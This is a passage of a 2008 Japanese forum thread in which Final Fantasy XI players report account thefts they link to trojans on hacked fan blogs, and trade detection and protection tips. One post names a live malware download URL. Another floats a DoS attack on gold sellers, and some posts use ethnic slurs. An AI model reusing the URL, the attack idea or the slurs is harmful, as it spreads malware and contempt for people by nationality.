きっと改ざんされたHPからトロイ入れられたんじゃないだろうか。
>>223 ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。
韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
とりあえず、書き込んだあとに自分のID確認してみような
237 :
既にその名前は使われています :2008/03/24(月) 19:16:24.20 ID:0G3UgKbW
Temporary Internet Filesの中の1つのファイルが 感染: Trojan-Downloader.VBS.Small.gn と診断されました マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが 最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません 中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか? 削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?
POLに適当なIDとパス入れた状態でアカハックさせればよくね
239 :
既にその名前は使われています :2008/03/24(月) 19:21:31.66 ID:8jcNID1A
>>233 Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe
>>239 ありがとうございまs
tracert“s”.exeはありませんでした
PG2が真っ赤なログで不安すぎる・・・
241 :
既にその名前は使われています :2008/03/24(月) 20:07:11.96 ID:Q/ktx4QO
マックでもアカハックされるの?マックにしようかなw
243 :
既にその名前は使われています :2008/03/24(月) 20:14:02.64 ID:vznh5385
カスペルオンラインスキャナ走らせたのだが、結果のレポートのところで 感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて ウィルス名のところに「ロックされています」て出てるのだが、これは何故?
245 :
既にその名前は使われています :2008/03/24(月) 20:37:12.64 ID:8jcNID1A
>>240 ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです
>>243 ほかのプログラムが使用中で開けないか削除できないから
今月のパス抜きで可能性あるのは3月上旬あたりと中旬以降に該当サイトにアクセスした人間全員? アクセス数から考えて、 アクセスしたけどん抜かれてない人が大多数だと思うんだけど、 その辺を分けてるものはなんだろ。 windows Update最新だと感染しないとかなのかな。
247 :
既にその名前は使われています :2008/03/24(月) 20:54:25.34 ID:kh97SrbK
>>246 ・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。
等々。
248 :
既にその名前は使われています :2008/03/24(月) 20:55:46.56 ID:lzZx8A86
>>233 >韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233 の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233 のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。
逆に
>>233 のPCから、58.227.193.190へアクセスしてるなら、
>>245 氏の言うとおり
何か仕込まれてるのかも。
>>233 ちょっと調べてみたが、韓国のスパムメール業者のIPらしいな。
なんかPCに入ってないか?
250 :
既にその名前は使われています :2008/03/24(月) 21:50:03.03 ID:47bjLYLG
定期保守上げを。
251 :
既にその名前は使われています :2008/03/24(月) 21:53:37.87 ID:UcF3Od6M
NOD32でも駆除できる?
Backdoor.Out Break nk210-201-139-91.static.apol.com.tw 感染しまくりのようです orz
253 :
既にその名前は使われています :2008/03/24(月) 22:14:23.47 ID:CHzqP0my
バハ鯖でまた垢ハック
254 :
既にその名前は使われています :2008/03/24(月) 22:15:19.89 ID:hdKDzAOI
255 :
既にその名前は使われています :2008/03/24(月) 22:28:28.26 ID:7DTVIQ6X
ネ実にわざわざ報告に来る人なんて被害者の100分の1くらいだろうし、実害数を考えると恐ろしい さて本営は何時までだんまりを決め込むのやら
256 :
既にその名前は使われています :2008/03/24(月) 22:31:14.88 ID:0jHdHBFL
業者対策へ本腰入れるのに3,4年掛かってるからな 1年後に対策したとしても、早いくらいだなw
>>253 えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー
事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?
んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?
パスをスクリーンキーボードで打ち込むようにしたんだが、 流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?
259 :
既にその名前は使われています :2008/03/24(月) 22:39:07.41 ID:0U03pW8G
>>258 今のところFF11の垢ハックのためのものは出てない、と思いたい
他のはあるのかよwwwwwww 恐ろしいな マジで
261 :
既にその名前は使われています :2008/03/24(月) 22:40:43.61 ID:GcBBAZhm
>>261 fc2ってだけでアクセスしたくないなw
264 :
既にその名前は使われています :2008/03/24(月) 23:19:20.01 ID:Yd7XwcSP
ノートン2008+PeerGuardian2で韓国やら香港やら厨国蹴って ZoneAlarmでファイアウォールを有効にして パスは手打ちで9桁。ブラウザはSleipnir WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない これでも抜かれるサイト踏んだらまず抜かれます? ていうかPeerGuardian2入れてみてビビッタ 別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・
265 :
既にその名前は使われています :2008/03/24(月) 23:25:51.11 ID:qfZn+dai
266 :
既にその名前は使われています :2008/03/24(月) 23:32:02.13 ID:lzZx8A86
>>261 そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。
268 :
既にその名前は使われています :2008/03/24(月) 23:40:22.20 ID:ApBIgGA/
仕事から帰ってきたらPOLパスワード変えられてました。 フレにGM呼んでもらって待ってるとこですが、 自キャラがどうやらログインしてる模様です。 なんだかなぁ・・・。
269 :
既にその名前は使われています :2008/03/24(月) 23:42:00.79 ID:We8pVkNe
>>268 アチャ・・・(ノ_< ;)
早くGM来て行動止めてもらえるといいな
270 :
既にその名前は使われています :2008/03/24(月) 23:44:12.74 ID:+KW5+qyc
271 :
既にその名前は使われています :2008/03/24(月) 23:44:47.78 ID:T6Wahbt1
>>215 でハックされたかもって言ったものだけどマジデされてた。
装備がエクレア品以外全部売られてて所持金が雀の涙ほどになってた。
マジデショックって言うかなんだかなぁって感じになるね
スクエニ様〜おねげぇデスじゃ〜24時間窓口作ってくだされぇ〜〜ッて感じだよね
273 :
268 :2008/03/24(月) 23:46:54.93 ID:ApBIgGA/
>>269 80件以上待ちだということです。
倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・
>>273 それムカツクな
暫定でもいいからしばらく窓口を24時間にしてほしい
275 :
既にその名前は使われています :2008/03/24(月) 23:51:06.74 ID:rpE40Jdl
そういえば、前ここでハックされたって報告来てた人が、2垢でGMコール呼びながら のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって 英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね
276 :
既にその名前は使われています :2008/03/24(月) 23:53:57.19 ID:1ggkpLWR
>>274 もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。
一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。
277 :
既にその名前は使われています :2008/03/24(月) 23:56:33.23 ID:u0FcALPC
解約→FFアンインスコ これが最大の防衛策に思えてきた 他のゲームならハックされたら公式HPでパスワード忘れた →新パスワードがメールで送られてくる →自分でログインしてINしてる業者落とす →公式HPでパス再発行、ここでメール受け取らなきゃ安全 OS再インスコ これ24時間できたりするのよ ハックされた人は面倒でもちゃんと警察に届けてね 届けないと□は「あなたが業者にパスとID教えた」 とみなすから
278 :
既にその名前は使われています :2008/03/24(月) 23:57:04.89 ID:DyD4MS3I
久しぶりにログインしたらキャラが裸だったとか 今後続きそうだな
279 :
既にその名前は使われています :2008/03/25(火) 00:00:11.53 ID:8jcNID1A
今月見つかったRealPlayerのActiveXコントロールの穴は 11.0.2でふさがったらしい 確証はないけど、今回の垢ハック騒動はこの穴も使われているかも 最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから アンインストール推奨だけどな
280 :
既にその名前は使われています :2008/03/25(火) 00:01:19.87 ID:mx3cOLzk
>>268 のフレです。
まだGM待ちです。
たぶん、GMじゃ役に立たないだろうけど、思いだけは伝えようかと。
>>280 ガンガレ!
あと早急に対策をしてほしいって念を押して下さい
毎日ハック報告を見るのは辛すぎる
今現在動いてる厨蚊がいるなら天安門事件なりなんなり、 そのあたりの言葉でログ埋め尽くしてやりたい気分だな。 その手の言葉、詳しくないからあまり知らないが・・・。
283 :
既にその名前は使われています :2008/03/25(火) 00:05:58.27 ID:GeAvoS1Q
ブログも一切見て無いが、やっぱり怖いよな・・・ 本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど そのうちとられたりするんじゃ無いかと思うと怖い・・・
284 :
既にその名前は使われています :2008/03/25(火) 00:07:24.68 ID:WD+HwGs7
>>283 今すぐカスペルオンラインスキャナするんだ!
285 :
既にその名前は使われています :2008/03/25(火) 00:08:09.82 ID:sGs0zFvT
バハ板も現在進行形でハック実況されてるなあ。 今回のメンテでなんとかして欲しいよ。
286 :
既にその名前は使われています :2008/03/25(火) 00:08:16.82 ID:GeAvoS1Q
>>284 したよ。ノートン共に0
火狐でNoscriptも入れてる
287 :
既にその名前は使われています :2008/03/25(火) 00:10:11.47 ID:j2GSQhJ6
白門でEでPT希望出してるKeycle
288 :
既にその名前は使われています :2008/03/25(火) 00:10:28.66 ID:8nsrrYgI
PS2&箱ユーザーだけど、ここみて背筋が寒くなったので、POLにインする際に メンバーパスワードを入れるようにしたよ。
289 :
既にその名前は使われています :2008/03/25(火) 00:10:30.53 ID:WD+HwGs7
>>286 スキャナでトロイ出無いてことは、今は取られてないんじゃない?
290 :
268 :2008/03/25(火) 00:10:35.61 ID:HuadLiyJ
>>274 窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。
私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。
ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。
※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。
Realpleyerの穴ってリアルプレイヤインスコしてなかったら無関係? 俺最近PCかい直してRPそのまま入れてないんだけど。
292 :
既にその名前は使われています :2008/03/25(火) 00:12:32.76 ID:ZVcNVdfz
専ブラで見たらレス数少ないクソスレ乱立しまくりだな ネ実は24時間あげあげあげえええ
293 :
既にその名前は使われています :2008/03/25(火) 00:12:33.76 ID:GeAvoS1Q
>>289 まぁ、ブログはまったく見て無いからねw
でも、何か怖いよね・・・・
まったく関係の無いHPにまで仕込まれたりしてたらどうにもならんし・・・
294 :
268 :2008/03/25(火) 00:14:14.08 ID:HuadLiyJ
>>280 さんくす!!
なんという掲示板の私的利用w
これ以上犠牲者を増やさないように
みなさんのフレにも告知してあげてください!
295 :
既にその名前は使われています :2008/03/25(火) 00:15:12.22 ID:WD+HwGs7
>>293 今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。
296 :
既にその名前は使われています :2008/03/25(火) 00:17:52.26 ID:czdY66qa
>>291 インスコしてなければおk
Realplayerの代わりにReal Alternative入れている人も古いActiveXコントロールが
インスコされるので注意。
297 :
既にその名前は使われています :2008/03/25(火) 00:18:43.66 ID:jhdd7oxY
バハ鯖で2日連続垢ハックwwwwww 被害者鯖スレに降臨中
298 :
既にその名前は使われています :2008/03/25(火) 00:23:29.00 ID:nQ1aeD7W
取り合えずパスは用心して変えておいた
GMも垢ハック専用窓口を24時間体制で作れ! 自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?! サポセンの電話は昼間だけだし・・・・・・
300 :
既にその名前は使われています :2008/03/25(火) 00:38:30.70 ID:ZVcNVdfz
俺ハックされたら鯖スレにキャラネーム晒してなんとかして助けてもらおうとするだろうなw だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。 ホント自分必死すぎでキモイ。
301 :
既にその名前は使われています :2008/03/25(火) 01:00:12.55 ID:omlW/ixG
>>300 だが昨日はそれで助かったのかもしれない
必死だと思うのはしかたなかろうw
302 :
既にその名前は使われています :2008/03/25(火) 01:03:42.77 ID:wU4wL3FZ
POLシステムを改良するか、サポセン24時間をすぐやれ!!
303 :
既にその名前は使われています :2008/03/25(火) 01:11:36.40 ID:f5GA3rVo
バハ鯖スレみてきたよ。 昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。 同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。 これからどんどんハックされる人でてくるんだろうなぁ、 有名ブログが改ざんされたわけだし。 まじで、業者ゆるせん
・サポセンの24時間サポート ・指定されたISP(IP)からのみログイン可 ・パスワードなどのアカウント情報変更時に秘密の質問 ・アカウント情報変更後にユーザーにメールで変更のお知らせ ・ログインメッセージ・公式サイトのトップページで注意喚起 ・LSCへのログインをPOLは別のID・パスワードに変更 このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は すぐ出来ると思うんだがな。 それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな ・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。
関わると危険だと言う意識が広まってしまうと、買い手が激減するだろうし 業者が自分で自分の首を絞めてるようにも思えるが・・・ こんなことが起きても、まだ買う奴なんているのかねぇ。
306 :
既にその名前は使われています :2008/03/25(火) 01:23:18.89 ID:9f0lVnnD
PS2だけど、PCでLSコミュニティとか使ってたし 怖いからPOLのパスワード変えといたぜー。 これでもうLSコミュニティとか二度と使わなければ 一安心かな?まあでも定期的にパス変えよっと。 おそろしやおそろしや。
307 :
既にその名前は使われています :2008/03/25(火) 01:25:00.75 ID:jhJ+BovV
>>305 自分は大丈夫。もしくはまた垢買うからいいんじゃね?
っていう思考じゃないかな
ここでの報告見てると バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民 前、救えネの洋ゲーやってたときはGMコールとか24時間対応で 返事から行動まですぐ対処してくれてたんだけどなー もう、そこまで力入れてないってことなのか・・・ 垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし メンテがそれの対策ならいいんだけどね 個人のデータ管理とOS側に頼るんだろうなー
309 :
既にその名前は使われています :2008/03/25(火) 01:25:25.04 ID:pm+l6zsS
ここが■の岐路だな。 きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。 が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。 次世代オンゲにも人が集まるわけは無い。 業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。
310 :
既にその名前は使われています :2008/03/25(火) 01:27:04.26 ID:7ZgQEQ9q
赤ハックされてないが俺もバハ鯖民だ まぁ俺はPS2だから大丈夫だとは思うけどな…
311 :
280 :2008/03/25(火) 01:31:21.14 ID:mx3cOLzk
280です。まだGMきません。 このシステムもいい加減にしてほしいですね。 メンテまで@30分。 こないで終わっちゃうかなぁ。 くやしいなぁ
312 :
既にその名前は使われています :2008/03/25(火) 01:32:16.79 ID:9f0lVnnD
>>311 がんばれ!泣き寝入りだけはしてほしくない!
313 :
既にその名前は使われています :2008/03/25(火) 01:35:42.94 ID:yV1jINTG
ソースコード書き込まれたらアウトならwikiとか危ないと思うんだけど違うの?
314 :
既にその名前は使われています :2008/03/25(火) 01:38:12.64 ID:4E2nw6wM
FFのWikiでリンク先を罠サイトに書き換えられたことはあった。 今はリンクたどって飛ぶときは警告出るようになってたはず。 ジョブ別のWikiはわからん…
wikiを見るだけで感染 ということはまったくないのだろうか?
317 :
既にその名前は使われています :2008/03/25(火) 01:40:25.33 ID:9ZDfFG9H
サービスは365日24時間なのに、サポセンはお休み有。 ふしぎ
318 :
既にその名前は使われています :2008/03/25(火) 01:41:28.99 ID:vHIgAKgq
フレのフレがさっきハックされた。 さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage
319 :
既にその名前は使われています :2008/03/25(火) 01:44:02.30 ID:hs/jxftM
頭おかしいよ業者 逆にDoS攻撃出来ないかな
>>317 仕方ない 中の人だってヒトの子だ
もし過労死なんかされたら被害者であるはずのこっちが殺人者扱いされる
てけとーなバイト雇って今以上にてけとーな対応されても困るし
321 :
既にその名前は使われています :2008/03/25(火) 01:46:49.14 ID:6E0RlrkX
今回被害にあって警察いって 電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。 ■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな? 金もらってサービスを受けてるのに、ろくなサポートもしねー。 何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか? 今回だけは明日はわが身だ
>>320 同じ人が常時対応してるワケじゃねーだろw
323 :
既にその名前は使われています :2008/03/25(火) 01:48:27.67 ID:9ZDfFG9H
今回のは結構被害者多そうな。
324 :
既にその名前は使われています :2008/03/25(火) 01:48:48.23 ID:9f0lVnnD
>>321 だよなあ。いままで不正もなにもしていない
ふつーのユーザーが突然被害にあうんだもん。怖すぎるよー。
明日はわが身だ。
325 :
既にその名前は使われています :2008/03/25(火) 01:52:33.09 ID:xwSNSLwB
業者はbotネット使って、DDoS攻撃してくるんじゃ? それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。 PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?
326 :
既にその名前は使われています :2008/03/25(火) 01:52:57.22 ID:4E2nw6wM
>>321 セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった
327 :
既にその名前は使われています :2008/03/25(火) 01:53:31.73 ID:xwSNSLwB
328 :
既にその名前は使われています :2008/03/25(火) 01:53:38.76 ID:2UE3q0B9
fc2の一件から被害の報告が増えたなー ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。 せめて公式にアナウンスして欲しいもんだ。 ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ
アカウントハックされてますってすぐにこないGMも糞だな。
330 :
既にその名前は使われています :2008/03/25(火) 01:57:26.83 ID:wc2s+Fxx
だとしても■側が出来るレベル、やって当然のレベルの対応を怠ってるってのは何度も言われてきてるんだよな。 暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。 正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、 「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。
GMのまにゅあるwでアカハックの優先順位がまだ低いんじゃない? 地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて すぐに対応するように決められると思う。 垢ハックは通常のコールと同じ優先順位の対応なんだろう。
カスペでスキャンしたとき ロックされてるって出る部分は安全なの?
住んでる地域や使用プロバイダやIPの情報を自分で登録して、そこ以外から 接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの? ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム
334 :
280 :2008/03/25(火) 02:01:51.03 ID:mx3cOLzk
くそ!メンテ時間までに来なかった。 直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた! 明日も朝からGM呼んでみるか。
335 :
既にその名前は使われています :2008/03/25(火) 02:02:57.84 ID:9f0lVnnD
336 :
既にその名前は使われています :2008/03/25(火) 02:03:03.50 ID:9ZDfFG9H
このメンテは何かの対策なのか、それとも単なる不具合の修正なのか・・・
337 :
既にその名前は使われています :2008/03/25(火) 02:04:57.38 ID:9HKbKXJk
対策ならPOLもメンテ入るだろうよ 今月いっぱいシカトするなら俺もちょっと引退考えるな ついていけない
パスワード2つ発行すればいいんじゃないか? ひとつは、いままでのIDとPASS。 もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。 緊急時には非常用のをPOL上でソフトウェア入力して使用。 あんまいみないかねー。
新スレ作るしかないか。■が嫌でも動かなきゃいけないくらい、いろんなとこに貼り付けるしかないな。
340 :
既にその名前は使われています :2008/03/25(火) 02:10:11.67 ID:WT1MZrdK
尻鯖だけど、知り合いから聞いただけでも今日垢ハックされたの3名 多すぎないか?
341 :
既にその名前は使われています :2008/03/25(火) 02:10:34.22 ID:6E0RlrkX
この2,3日はまじで「おまえらー」とかネタスレ作って遊んでる場合じゃねーよ まじで
342 :
既にその名前は使われています :2008/03/25(火) 02:11:08.82 ID:wU4wL3FZ
>>338 あるでしょ
緊急用で発行されたもので入ると、即時アカウント凍結とか
さらにそれをHPで登録したメアド宛に発行できるといい
343 :
既にその名前は使われています :2008/03/25(火) 02:12:17.77 ID:hs/jxftM
支那が喋れない様な日本語の音声認証をですね
344 :
既にその名前は使われています :2008/03/25(火) 02:12:41.06 ID:9ZDfFG9H
>>338 24時間対応してるなら、あまり意味ないかもしれんが、
現状では意味あるんじゃね?
やばすぎだろ。ここまで、堂々とやられてるのに、何も対応しないとは、■倒産してもいいわ。
>>341 【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】
347 :
既にその名前は使われています :2008/03/25(火) 02:14:50.98 ID:dKvvhOTu
>>329 アカウントハックされてる奴が多すぎてその順番待ちらしいw
フレがハッキンされて3時間ほど待たされた時の一言
348 :
既にその名前は使われています :2008/03/25(火) 02:15:38.30 ID:9ZDfFG9H
大問題じゃないか
349 :
既にその名前は使われています :2008/03/25(火) 02:15:44.70 ID:WT1MZrdK
身近な人間がやられるまでは対岸の火事と思えるが 実際に知り合いがやられると、理不尽な相手に対する怒りと 盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する
350 :
既にその名前は使われています :2008/03/25(火) 02:15:54.43 ID:/5SLOYFD
もうゲーム内での迷惑行為ではなくてリアルに犯罪だもんなあ。 犯罪で金稼ぎ。
351 :
既にその名前は使われています :2008/03/25(火) 02:15:59.57 ID:b1jIPTS8
そんなファッキングされてんだwwwwwwwwwwwwww
352 :
既にその名前は使われています :2008/03/25(火) 02:17:16.72 ID:auLaoDR9
競売のサイトの奴とかも怖いぜo(`д´o)
353 :
既にその名前は使われています :2008/03/25(火) 02:17:26.74 ID:2UE3q0B9
よくフリーメールとかにある「パスワードを忘れて再発行する時のための秘密の質問」 みたいのはどうだろう。 ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを 変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。 今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。 それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな
GM>垢ハック被害のコール多くて頭おかしくなって死ぬ
すれたてしただけで、罠にはひっかからないよな・・・?
サポセン体制やらさらなる対策を行うとすれば その分のコストをどこから出すのかが問題かねぇ 月の課金額をリネ2並みにするなりしないと 株式会社としては利益を削る方向には動けないだろうし
357 :
既にその名前は使われています :2008/03/25(火) 02:22:56.51 ID:9f0lVnnD
>>355 安心してスレ立てしておk。
2chがハッキングされたことってあるの?w
358 :
既にその名前は使われています :2008/03/25(火) 02:24:08.74 ID:9f0lVnnD
>>356 本当にサポートやサービスが良くなるのなら
少々値上がりしても文句ないなー。
359 :
既にその名前は使われています :2008/03/25(火) 02:24:24.31 ID:hpBmpOa9
アカハックされたときFFからGMコールして6時間またされたなぁ 夜間だとPOLから呼んだほうがはやいかも?
360 :
既にその名前は使われています :2008/03/25(火) 02:24:39.85 ID:czdY66qa
>>357 クラックされてログが消えたことがあったかと
361 :
既にその名前は使われています :2008/03/25(火) 02:25:16.82 ID:58aTjjEl
>>347 マジっすかw
有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。
スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w
362 :
既にその名前は使われています :2008/03/25(火) 02:25:20.96 ID:9f0lVnnD
>>357 何度かあるよ
ここ4年ほどないと思うけど
364 :
既にその名前は使われています :
2008/03/25(火) 02:27:39.10 ID:o+wp7W1W >>353 悪くはないと思うが、
アレって結構ザルなんだよねぇ
誕生日や好きなヒーローとかは設定するのはいいが、
試行回数が無限だとパスワードアタックし放題
大手サイト程この傾向が多いしねぇ